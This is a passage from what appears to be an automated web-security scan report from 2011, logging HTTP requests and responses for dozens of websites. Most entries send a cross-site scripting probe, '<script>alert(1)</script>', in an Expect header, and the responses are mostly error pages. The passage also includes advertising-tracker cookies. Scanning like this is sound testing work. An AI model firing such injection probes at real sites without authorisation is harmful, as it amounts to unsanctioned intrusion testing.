GET /site/3945?ret=html&phint=__bk_t%3DWelcome%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=22181052 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bk=e1mPh2iZ/VKVIHOf; bkc=KJpM8sPQZsfY0nO88x84HQRsOATQd8Tvv+IhAysacXmYTn1OIKFZ1MvLHrnUGws7ZYeT7ay1e9KZ1beyD8oHIRTB3cyxMVpKqHPDX6crxISel94M9yODsYNN; bko=KJ0E8VBQtnh0CbXYQ0ux5Vqaek2ICiGQbIuucqb1e1qLe9pfyvyfF9y1vR+OnsXTuhU/0rROLHvOg9yySh/qC1U1999p5HUd; bkw5=KJpE+Z/9QCvsW6YuWzxWAo0X666Rs4uHjJCxjsfq/VuRDVEzfDcLW3QRCsEMgj7n0999mnyv5x==

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Set-Cookie: bklc=4dbe0fda; expires=Wed, 04-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=chBAO2thl+ZVIHOf; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpn8s5QIwsRAKWVdp84HQRsCAyQUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIEWLYeT7nywe5OBsCL6g5Xe82NHxIRb5eYCXAcTR7yl/UpKUAVWNWgXsMEdaO1c78sJQmeY59RV46Gpv5th98RBGjwBr3bYSel/41CdAwCQ491l+ugD=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQr1Vdp8KHxjSwQVcp0CtIYQ0uxBSjaE+XIHZ3Qv0EulR9jRljsHMtQPklKOARDCSeVBbXWnN1evo9PMRwuYyHvLq11/AByZJk999zIhAI; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNvhW9DCVIh/sCVY6+CLq9BpmI5ZEvrzPPRkCM5D7cYOYsyVTxATQFRnfbYMuQtQCjiRVa+RI1nVBMRtEgjuZ0dXlcmFHNTVQHRQsouEvqB8eHTccqQhS1B0nCMWGDnkqRtanZEGuDDxImL66TEQREwwZI2ddSlTZwktSBFMNSOvTJGsO5vDLAkzZZm8QrUuyegRJnAneLR0V3cfjbGpDnDQ8ukO3+XBYMEg48wf2bfP285QlTDoday7JYTSFqMwPPVhtiMrL0toXVXLCr6i6yhyEDuSCCEViYMKFjNTIBKa0Y9jrHLW8tnyloz0TLfp2IffuDvDPGoJvWLoTxxSdv1GgqYZipcpnyI+mfNXgXd4yc+WaPx; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9L1tDQzsBL8nC9M+/p1TuHsq0uTLp1sCq9HDpkeYzR9YJ1ROJE+foJGy1IAQ0EYQ0+I6x1LyG1rft/cRJP9hYLFcVpsPASc5QRWiE3sH/9Rr2zWYT9aUZJjv1QHwWw0OfrO7R7OcItxF6syBFJz1njoeqag+O2eOP1M999Jbv/oA=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 997
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1182795&id=1182798&id=1182799&id=1182843&t=2" width=1 height=1 border=0 alt="">
<img src="h
...[SNIP]...
33.13. http://tomopop.com/index-ad-anime.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tomopop.com
Path:   /index-ad-anime.phtml

Request

GET /index-ad-anime.phtml HTTP/1.1
Host: tomopop.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:30 GMT
Server: lighttpd/1.4.28
Content-Length: 2874

<html>
<body bgcolor=white leftmargin=0 topmargin=0>


<table cellpadding=0 cellspacing=0 border=0 style="margin-top:10px;">

<tr>

<td colspan=4><B><font size=2 face=arial color=#666666 style=margin-
...[SNIP]...
33.14. http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

Request

GET /jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security] HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:49 GMT
Connection: close
Content-Length: 503

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://ec.atdmt.com/images/pixel.gif','http://na.decdna.net/n/61239/71938/EI6/x/e?value=0&trans=&domain=na
...[SNIP]...
33.15. http://www.100grandinstantwin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.100grandinstantwin.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.100grandinstantwin.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:51:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>
33.16. http://www.2hairy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2hairy.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2hairy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Sun, 01 May 2011 23:42:29 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
33.17. http://www.92kqrs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.92kqrs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.92kqrs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 68
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDCSADQTQA=DOHBJHPCELCDEEPCDMDKOFHJ; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021f0d45525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.92kqrs.com:80/favicon.ico
33.18. http://www.ahima.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ahima.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ahima.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:09:36 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.19. http://www.allsup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allsup.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allsup.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:38:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.20. http://www.amateurathome.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amateurathome.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurathome.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:54:14 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>
33.21. http://www.argosy.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.argosy.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.argosy.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:00:38 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
33.22. http://www.babynameshub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babynameshub.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.babynameshub.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:24:52 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.23. http://www.benchmade.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.benchmade.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.benchmade.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:11:43 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.24. http://www.bitstatement.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bitstatement.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bitstatement.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
X-Powered-By: BIT
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 22:58:30 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
33.25. http://www.blackintrusion.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackintrusion.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackintrusion.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Mon, 02 May 2011 00:35:47 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>
33.26. http://www.clipsguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clipsguide.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clipsguide.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 01 May 2011 19:40:43 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
33.27. http://www.coolquiz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolquiz.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coolquiz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 May 2011 23:35:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html
Page-Completion-Status: Normal


                                                                       <html>
   <head><title>Page Not Found</title>
   </head>
   <style>
   
   body {background-color: FFFFFF;}
   .bg0 {padding:0p
...[SNIP]...
33.28. http://www.cramster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cramster.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cramster.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:55 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.29. http://www.crankyape.com/crankyape_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /crankyape_logo.gif

Request

GET /crankyape_logo.gif HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 01:53:15 GMT
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
33.30. http://www.cricbuzz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 May 2011 00:08:23 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
33.31. http://www.cyberhomes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cyberhomes.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cyberhomes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.32. http://www.dailynewnowa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailynewnowa.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailynewnowa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

33.33. http://www.dermnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dermnet.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dermnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:01:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.34. http://www.diskeeper.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diskeeper.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diskeeper.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.35. http://www.earthfare.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.earthfare.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.earthfare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:10:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.36. http://www.easyearnsurveys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.easyearnsurveys.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.easyearnsurveys.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:22:41 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>
33.37. http://www.expresstoll.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expresstoll.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expresstoll.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Content-Length: 368
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:23:04 GMT

<script type="text/javascript">
function redirectToHttps()
{
var httpURL = window.location.hostname + window.location.pathname;

var httpsURL = "https://" + httpURL ;

if(window.lo
...[SNIP]...
33.38. http://www.female-anatomy.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.female-anatomy.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.female-anatomy.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Sun, 01 May 2011 23:35:35 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>
33.39. http://www.flashymodels.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flashymodels.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flashymodels.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Sun, 01 May 2011 23:22:06 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>
33.40. http://www.forrabbits.eu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forrabbits.eu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.forrabbits.eu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

33.41. http://www.freegroceriesdirectory.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freegroceriesdirectory.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freegroceriesdirectory.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.42. http://www.giftcertificatedelivery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giftcertificatedelivery.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.giftcertificatedelivery.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:52:15 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>
33.43. http://www.govacuum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.govacuum.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.govacuum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:16:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.44. http://www.gpwa.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gpwa.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gpwa.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
